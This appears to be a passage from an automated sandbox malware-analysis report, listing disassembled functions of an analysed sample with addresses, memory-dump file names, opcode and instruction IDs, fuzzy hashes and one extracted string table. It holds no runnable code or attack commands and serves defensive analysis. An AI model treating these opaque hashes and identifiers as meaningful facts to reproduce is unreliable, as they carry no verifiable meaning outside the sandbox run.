                                                                                                      • Instruction Fuzzy Hash: D601B67091490D8FDF84EF68C858AAE7BF0FB68305F1045AAA41DD32A4DB31A694CB80
                                                                                                      Function 00007FFD9BF34DA8 Relevance: .0, Instructions: 41COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1854198551.00007FFD9BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bf30000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a8bd04a8768f5f5afcf2dd3f70d2ee558fda7b41a087e421747cbeefac0e0ec1
                                                                                                      • Instruction ID: fc4c0a0a02db424d21f319c2ec389e112aac83707aa95432bafa2a63857749c2
                                                                                                      • Opcode Fuzzy Hash: a8bd04a8768f5f5afcf2dd3f70d2ee558fda7b41a087e421747cbeefac0e0ec1
                                                                                                      • Instruction Fuzzy Hash: 1801A83091490D9FDF84EF58C858AAE77F0FB68305F10456AA819D3264DB35A694CB80
                                                                                                      Function 00007FFD9BF379B8 Relevance: .0, Instructions: 40COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1854198551.00007FFD9BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bf30000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9834de9ee7dc669eb6ffbdc1d82226d29e5d738c5105574c141452503d6793cc
                                                                                                      • Instruction ID: d70fcde9496fc0a547820296fbd9aa74c6a6bdf9fd62c3e21fe60920bc10d749
                                                                                                      • Opcode Fuzzy Hash: 9834de9ee7dc669eb6ffbdc1d82226d29e5d738c5105574c141452503d6793cc
                                                                                                      • Instruction Fuzzy Hash: 06011D30914A4D9FCF44EF58C499AE97BF0FB28305F1001AAE40DD3260DB31A594CB81
                                                                                                      Function 00007FFD9BF37268 Relevance: .0, Instructions: 39COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1854198551.00007FFD9BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bf30000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e17439317d7d94393fe5ff507594e32d79eb1f34d026f7c0285aca8cd09bff8e
                                                                                                      • Instruction ID: 4b26696c05c39e13c707ddace5e0048d6e390fbe130dd9cb00284e78222dd60a
                                                                                                      • Opcode Fuzzy Hash: e17439317d7d94393fe5ff507594e32d79eb1f34d026f7c0285aca8cd09bff8e
                                                                                                      • Instruction Fuzzy Hash: F4F0D13194E68D5FEB129B605865AE87FB0AF06344F0A01E3E448CB0A3E9295645C751
                                                                                                      Function 00007FFD9BF37800 Relevance: .0, Instructions: 39COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1854198551.00007FFD9BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bf30000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b65957df33ae4c5024bf74a6375930363bf4a4540daaf91ed4b6793f65194ce1
                                                                                                      • Instruction ID: f4bef0917f032f9f53de891f48a8a37175a9adea9fc71bde7d3b3de35b834428
                                                                                                      • Opcode Fuzzy Hash: b65957df33ae4c5024bf74a6375930363bf4a4540daaf91ed4b6793f65194ce1
                                                                                                      • Instruction Fuzzy Hash: AE01C93091490D8FDF84EF58C858AEA77F0FB68305F1005AAA41DD32A4DB75A694CB81
                                                                                                      Function 00007FFD9BF305D2 Relevance: .0, Instructions: 38COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1854198551.00007FFD9BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bf30000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 98090d31bfe285884e1cc89e4ad3276083117308eba052fd65392e21f98d7b76
                                                                                                      • Instruction ID: 77088584afda8b5f090a9e2d8d8b58bd29fe68d58d8fa0dd70ac10946fc2c4bc
                                                                                                      • Opcode Fuzzy Hash: 98090d31bfe285884e1cc89e4ad3276083117308eba052fd65392e21f98d7b76
                                                                                                      • Instruction Fuzzy Hash: BDF0903244F2CD9FD3229FB089219E97FB8AF43204B1A02E7E446C70B2C92D6756D761
                                                                                                      Function 00007FFD9BF34E48 Relevance: .0, Instructions: 37COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1854198551.00007FFD9BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bf30000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b6cd33a9997b3b305f9d72a52943336feb6f0f75a81ae122509d9ebaf65a622a
                                                                                                      • Instruction ID: 0fbcdb5ae585222c504386f6699d2837b84f6eec680b1a50b9fe34b47876331c
                                                                                                      • Opcode Fuzzy Hash: b6cd33a9997b3b305f9d72a52943336feb6f0f75a81ae122509d9ebaf65a622a
                                                                                                      • Instruction Fuzzy Hash: 8BF09C3091490D9FDF95EF68C858AAE77F0FB28305F0005AAE41DD31A4DB31A694CB41
                                                                                                      Function 00007FFD9B8906A5 Relevance: .0, Instructions: 35COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1805826411.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7d31a7999dcbe1097eb39d29b9c85b3d1fcb6ceeff826cf4200454c4220628e2
                                                                                                      • Instruction ID: 9f3de1fcc29f88c8515f6b83ce3b10cd75516aa7f3854e9c2fad6d7ef44b099e
                                                                                                      • Opcode Fuzzy Hash: 7d31a7999dcbe1097eb39d29b9c85b3d1fcb6ceeff826cf4200454c4220628e2
                                                                                                      • Instruction Fuzzy Hash: 4DF03031A1960E9FEF51EF58D8596ED7BE0FF58301F110436E81CD21A0DA34A2A0C781
                                                                                                      Function 00007FFD9B8913E0 Relevance: .0, Instructions: 33COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1805826411.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 546168faeb150ba41c92c32a5d757d5bb43e123ace3d538c729a40f3cdbe0215
                                                                                                      • Instruction ID: 4393eecb236b513e809e2b9ffc2789ff2c9d7dd1b7307b267e4cc35d29111e86
                                                                                                      • Opcode Fuzzy Hash: 546168faeb150ba41c92c32a5d757d5bb43e123ace3d538c729a40f3cdbe0215
                                                                                                      • Instruction Fuzzy Hash: E8F0A930A1494D9FDF94EF58C488AAA7BE0FF68305F010566E81DD3264D730E594CB81
                                                                                                      Function 00007FFD9B8906C0 Relevance: .0, Instructions: 33COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1805826411.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e958707be2d48850fb43fdf5bce7e9f23c89eed99871522b6fbc306495f31f00
                                                                                                      • Instruction ID: 9e2673c47651fed7972ba69cc3497b19b537246b9911a0229100f608fdf6880c
                                                                                                      • Opcode Fuzzy Hash: e958707be2d48850fb43fdf5bce7e9f23c89eed99871522b6fbc306495f31f00
                                                                                                      • Instruction Fuzzy Hash: BCF0303091950E9FEB55EF6494596ED7BE0FF18304F010176E81CD21A5DA34A2A0C781
                                                                                                      Function 00007FFD9B895E96 Relevance: .0, Instructions: 32COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1805826411.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b57fd32d69fabe09c8a69e6f4bfa3f6c048901c29123a4572fa243570d179f16
                                                                                                      • Instruction ID: df5c21c2fe636101be0b82ff51eafb86ffad4119ea9eace764540ba96c6a989a
                                                                                                      • Opcode Fuzzy Hash: b57fd32d69fabe09c8a69e6f4bfa3f6c048901c29123a4572fa243570d179f16
                                                                                                      • Instruction Fuzzy Hash: 54010834E0A62DCEEB75DB54C894BE9B7B0AB58312F1542B5C00C922A0DF386BC48F40
                                                                                                      Function 00007FFD9B8998F1 Relevance: .0, Instructions: 30COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1805826411.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ea4ab01a76dfbc36cdf04d4e3c449c07d627bae5a0fc550f61accfbf8331d433
                                                                                                      • Instruction ID: 6eba4cde3f26e6e806468d3fea7bf3a342a89a3ced0f32bccd9533460ec11ff6
                                                                                                      • Opcode Fuzzy Hash: ea4ab01a76dfbc36cdf04d4e3c449c07d627bae5a0fc550f61accfbf8331d433
                                                                                                      • Instruction Fuzzy Hash: 5BF03071E0D51D8EDBE5DB1C88686A9A7E1EF5C311F1142FAD01DD2292DE342AC14F01
                                                                                                      Function 00007FFD9B890CD7 Relevance: .0, Instructions: 28COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1805826411.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6ee9b1d85b9a7898d19301988afee745d61309a538c23897069a8cf6867d1bee
                                                                                                      • Instruction ID: 66773e6f871d43cf353646f4ffc41194094f7631ee2fc1ea80b8b4723a2a315d
                                                                                                      • Opcode Fuzzy Hash: 6ee9b1d85b9a7898d19301988afee745d61309a538c23897069a8cf6867d1bee
                                                                                                      • Instruction Fuzzy Hash: 25F0C230A0D11A8BEB14CB84C8947FDBBB1FB54305F040A3AC025972D2CB786680CB80
                                                                                                      Function 00007FFD9B8973E8 Relevance: .0, Instructions: 25COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1805826411.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9542ce149f7c00e92b5871e1e71b0f5614247fc5ec5cb60f4078341298d3f71c
                                                                                                      • Instruction ID: ca335c1ab3044eeb2f578462e741b06802d4d11c8b463cf76b11c0316da94e3f
                                                                                                      • Opcode Fuzzy Hash: 9542ce149f7c00e92b5871e1e71b0f5614247fc5ec5cb60f4078341298d3f71c
                                                                                                      • Instruction Fuzzy Hash: 6EF0FE71E099198AEBA4DB18DC656E9BAA1EF84345F1141F6900EDA2D6CE342E828F41
                                                                                                      Function 00007FFD9B899889 Relevance: .0, Instructions: 24COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1805826411.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c2483e697cb09b4499d40dd20cfcf6b6a451370ee6a3b020d97d26b60c85e404
                                                                                                      • Instruction ID: 20a724f215f4a0c8b69886e38c42288f13c2ce18558ef73e0352ade87c37a01a
                                                                                                      • Opcode Fuzzy Hash: c2483e697cb09b4499d40dd20cfcf6b6a451370ee6a3b020d97d26b60c85e404
                                                                                                      • Instruction Fuzzy Hash: F6E0C971E0D52D8AEFB5DB4C8858AA9A7B1EB58311F1142E9D00DD22A2DE356A818F01
                                                                                                      Function 00007FFD9BF3A990 Relevance: .0, Instructions: 23COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1854198551.00007FFD9BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bf30000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6ea1064084b7543947cbf08e8a62aaf91d5e31c12d2d9aa3c866e9e38eba9116
                                                                                                      • Instruction ID: e9ec41ebb96609f7bba5d70df9d2a84e7b644c626eb7b14a1179d9a406400274
                                                                                                      • Opcode Fuzzy Hash: 6ea1064084b7543947cbf08e8a62aaf91d5e31c12d2d9aa3c866e9e38eba9116
                                                                                                      • Instruction Fuzzy Hash: 8BE04F3054564E8FDB64EF54D8526EA77E0FF54344F010225E81CC2194DA75A664CBC1
                                                                                                      Function 00007FFD9BF37290 Relevance: .0, Instructions: 21COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1854198551.00007FFD9BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bf30000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7c34e5eb15630ff9f10c61a57f310d3ff136ee0aeb899afad87fe31393d34575
                                                                                                      • Instruction ID: a2ced0fe5691c44de4e49ebfe67ee2e34b6af769087afd4fe6e8e613ac2d9732
                                                                                                      • Opcode Fuzzy Hash: 7c34e5eb15630ff9f10c61a57f310d3ff136ee0aeb899afad87fe31393d34575
                                                                                                      • Instruction Fuzzy Hash: 7DE08C30D6590D9AEB50FBB48849AEDB7E0FF08304F4008A2E80DC20A4EA346294CB41
                                                                                                      Function 00007FFD9BF31DAB Relevance: .0, Instructions: 11COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1854198551.00007FFD9BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bf30000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b6500b25f363068e536d22feed2c8d38408de967dfd6cba37f0467665b04deb1
                                                                                                      • Instruction ID: ad82b902f8aba72bb63ca93746f4111cfc2e554f9c610b53a7c1211fa6a45af0
                                                                                                      • Opcode Fuzzy Hash: b6500b25f363068e536d22feed2c8d38408de967dfd6cba37f0467665b04deb1
                                                                                                      • Instruction Fuzzy Hash: F8D0C910B0F54F95F6384ED2903167A65D04F12380E6286BED15F419EDCE1F7B026251
                                                                                                      Function 00007FFD9BF312E1 Relevance: .0, Instructions: 6COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1854198551.00007FFD9BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bf30000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 94f8d0cb44dc7064a4abf28e1a7ed7f250e852ca5e371d78a196ac5910f18002
                                                                                                      • Instruction ID: 5c983728e1dba2c37447a62410adaf54754052dc252ef235fdf65f7a888703de
                                                                                                      • Opcode Fuzzy Hash: 94f8d0cb44dc7064a4abf28e1a7ed7f250e852ca5e371d78a196ac5910f18002
                                                                                                      • Instruction Fuzzy Hash: 9AB01200F0E20B63F13004F008B103D00810B053C0E120B70D10B862EBDC8F3B00A160

                                                                                                      Non-executed Functions

                                                                                                      Function 00007FFD9BA4063B Relevance: 133.7, Strings: 105, Instructions: 2497COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1810831910.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9ba40000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $!$"$#$$$%$%`J$%`J$%`J$&$'$($)$*$+$,$-$.$/$0$1$2$3$4$5$6$7$8$9$:$;$<$=$>$?$@$A$B$C$D$E$F$FaoZ$G$H$I$J$K$L$M$M'S]$M'S]$M'S]$MH($N$O$P$Q$R$S$T$U$V$W$X$Y$Z$[$\$]$^$_$`$a$b$b%r$b%r$c$d$e$f$g$h$i$j$k$l$m$n$o$p$q$r$s$t$u$v$w$x$y$z${$|$}$~
                                                                                                      • API String ID: 0-336665899
                                                                                                      • Opcode ID: cbf72889c3222e7c152b4f134887bbf72f249c8d4d645be9f6bdb49cef22e351
                                                                                                      • Instruction ID: 1fc7d465a702b64cab675b6a878f1ddb93a4f5734c948885b5cc83397ff1d00d
                                                                                                      • Opcode Fuzzy Hash: cbf72889c3222e7c152b4f134887bbf72f249c8d4d645be9f6bdb49cef22e351
                                                                                                      • Instruction Fuzzy Hash: 1843FC70A5551D8FDBA9EB14D8A5BBAB3B1FF48310F4045EAD00EA7292DE356E81CF40
                                                                                                      Function 00007FFD9BA5522F Relevance: 1.8, Strings: 1, Instructions: 501COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1810831910.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9ba40000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 1_^
                                                                                                      • API String ID: 0-3204887481
                                                                                                      • Opcode ID: 6341c1d897c4ad87f7ec14fbe0ac6a9fa8a226e14b219ae2b6cd2562bfdb269d
                                                                                                      • Instruction ID: cbd0255bba2f708c6f90c6f0262c244a0d9dd735654053cee777750ad44d6542
                                                                                                      • Opcode Fuzzy Hash: 6341c1d897c4ad87f7ec14fbe0ac6a9fa8a226e14b219ae2b6cd2562bfdb269d
                                                                                                      • Instruction Fuzzy Hash: 1802E662D0E3E35BD31AABB8ACB64D93F60DF0212870D41F7D4998B0E3ED5D754A8254
                                                                                                      Function 00007FFD9BA53B37 Relevance: 1.5, Strings: 1, Instructions: 284COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1810831910.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9ba40000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: <_H
                                                                                                      • API String ID: 0-1124767163
                                                                                                      • Opcode ID: 01037d92da39c877ed1d498fcb03ce4b97c9467b22ea5bb1415fbcf0def4d1b9
                                                                                                      • Instruction ID: 1bfe86dbbc0217b0c0fffde98466bea661489e826366c74fb94d5be7e6cb5090
                                                                                                      • Opcode Fuzzy Hash: 01037d92da39c877ed1d498fcb03ce4b97c9467b22ea5bb1415fbcf0def4d1b9
                                                                                                      • Instruction Fuzzy Hash: 67A18462A0F2A35BD71BB7B8B8794E57FA09F0222C70C41F7D0ED8A097ED58614A8654
                                                                                                      Function 00007FFD9BA91190 Relevance: .6, Instructions: 573COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1810831910.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9ba40000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8365fc6a8b384091efffb3e0cdd5e99b5b9eba47915bdff9ced28aa7d0cc11ec
                                                                                                      • Instruction ID: 55eafea3fb9426f27f7c8c2c48135ed7685c478d7cf97f9443ac3765a3ad20ef
                                                                                                      • Opcode Fuzzy Hash: 8365fc6a8b384091efffb3e0cdd5e99b5b9eba47915bdff9ced28aa7d0cc11ec
                                                                                                      • Instruction Fuzzy Hash: 4BF1F953B0F1B25BD31AB76CFCB98E63B90DF1226870942F7D0988B0D7EC4965879285
                                                                                                      Function 00007FFD9BA55D60 Relevance: .5, Instructions: 473COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1810831910.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9ba40000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 32b5d907424cd73e8f51e46d0e20a4eae7fa6509cf683f7672027903a68cd527
                                                                                                      • Instruction ID: a1d9df7546ccda22b101ed00f4547e9b21f44c80ba1f124a6cd8b77adfe64af6
                                                                                                      • Opcode Fuzzy Hash: 32b5d907424cd73e8f51e46d0e20a4eae7fa6509cf683f7672027903a68cd527
                                                                                                      • Instruction Fuzzy Hash: 69E1275290E2B35BD31AB778BDBA8E67F90DF0222C70C41F7E0AD4B0D7AC4D614A9195
                                                                                                      Function 00007FFD9BA54EC9 Relevance: .1, Instructions: 115COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1810831910.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9ba40000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 08ecc16264257d8c9e847133423d20cb885b24f4097ce79abdab49194ba47262
                                                                                                      • Instruction ID: 5cd3685c2b3306509e4089790e1408f1322eb19f319ef6e3e573605772b2efdb
                                                                                                      • Opcode Fuzzy Hash: 08ecc16264257d8c9e847133423d20cb885b24f4097ce79abdab49194ba47262
                                                                                                      • Instruction Fuzzy Hash: D831F912E0E3E35AD31EA6B878A54E97F00DF0122CB1941FFD09D4B0EB9D59664AA1D4
                                                                                                      Function 00007FFD9BA4BDED Relevance: .1, Instructions: 101COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1810831910.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9ba40000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 119ed448781f02dc038e16fcf182568f954143158dc206735ad0fcca6b32a087
                                                                                                      • Instruction ID: a85a3e2522ccb48a5702fb23c651da5b0e5a41b273fafc55b1d36bc0f06ba998
                                                                                                      • Opcode Fuzzy Hash: 119ed448781f02dc038e16fcf182568f954143158dc206735ad0fcca6b32a087
                                                                                                      • Instruction Fuzzy Hash: 3931D270A18A1DCFCF88DF98D491AEDBBF1FB69300F6011AAE419E3291C735A941CB44
                                                                                                      Function 00007FFD9BA55167 Relevance: .1, Instructions: 60COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1810831910.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9ba40000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3e9803fa8f6e4e7b805fec76dbf706326a4cfe507dc4d98e6e9681457c183188
                                                                                                      • Instruction ID: 6ff837cfc720a02541efe66728221fa158a9c053fa864a77ccfe420f460f4b93
                                                                                                      • Opcode Fuzzy Hash: 3e9803fa8f6e4e7b805fec76dbf706326a4cfe507dc4d98e6e9681457c183188
                                                                                                      • Instruction Fuzzy Hash: 67113732908B52BB8319AE78D4924C1F765FF44218775863FC416C7D92C776F516CAC0

                                                                                                      Executed Functions

                                                                                                      Function 00007FFD9B76EB89 Relevance: .1, Instructions: 122COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
